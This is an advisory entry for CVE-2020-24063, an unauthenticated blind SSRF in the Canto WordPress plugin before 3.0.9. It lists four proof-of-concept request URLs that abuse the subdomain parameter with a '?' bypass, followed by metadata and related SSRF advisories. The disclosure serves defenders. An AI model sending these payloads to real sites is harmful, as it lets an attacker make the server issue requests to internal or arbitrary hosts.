Canto < 3.0.9 – Unauthenticated Blind SSRF | CVE 2020-24063 | Plugin Vulnerabilities

Description

The plugin is affected by Blind SSRF issues via the domain parameter in three files: /includes/lib/tree.php, /includes/lib/detail.php, /includes/lib/get.php and /includes/lib/download.php. All requests to the arbitrary domain/IP will be made with the HTTPS protocol

Proof of Concept

https://example.com/wp-content/plugins/canto/includes/lib/detail.php?subdomain=<IP:PORT>?
https://example.com/wp-content/plugins/canto/includes/lib/get.php?subdomain=<IP:PORT>?
https://example.com/wp-content/plugins/canto/includes/lib/tree.php?subdomain=<IP:PORT>?
https://example.com/wp-content/plugins/canto/includes/lib/download.php?subdomain=<IP:PORT>?

Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

Affects Plugins

Fixed in 3.0.9

References

CVE

CVE

CVE

CVE

URL

https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0

Classification

Type

SSRF

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

p4nk4jv

Verified

Yes

WPVDB ID

29c89cc9-ad9f-4086-a762-8896eba031c6

Timeline

Publicly Published

2020-11-30 (about 5 years ago)

Added

2020-12-01 (about 5 years ago)

Last Updated

2025-04-10 (about 1 year ago)

Other

Published

Title

Published

2023-10-19

Title

Motors – Car Dealer & Classified Ads < 1.4.7 - Unauthenticated SSRF

Published

2016-12-08

Title

Nelio AB Testing <= 4.5.8 - Server Side Request Forgery (SSRF)

Published

2013-06-21

Title

WordPress 3.5-3.5.1 HTTP API Unspecified Server Side Request Forgery (SSRF)

Published

2025-04-24

Title

BeerXML Shortcode < 0.8 - Authenticated (Contributor+) Server-Side Request Forgery

Published

2025-09-22

Title

SEO Backlink Monitor <= 1.6.0 - Authenticated (Administrator+) Server-Side Request Forgery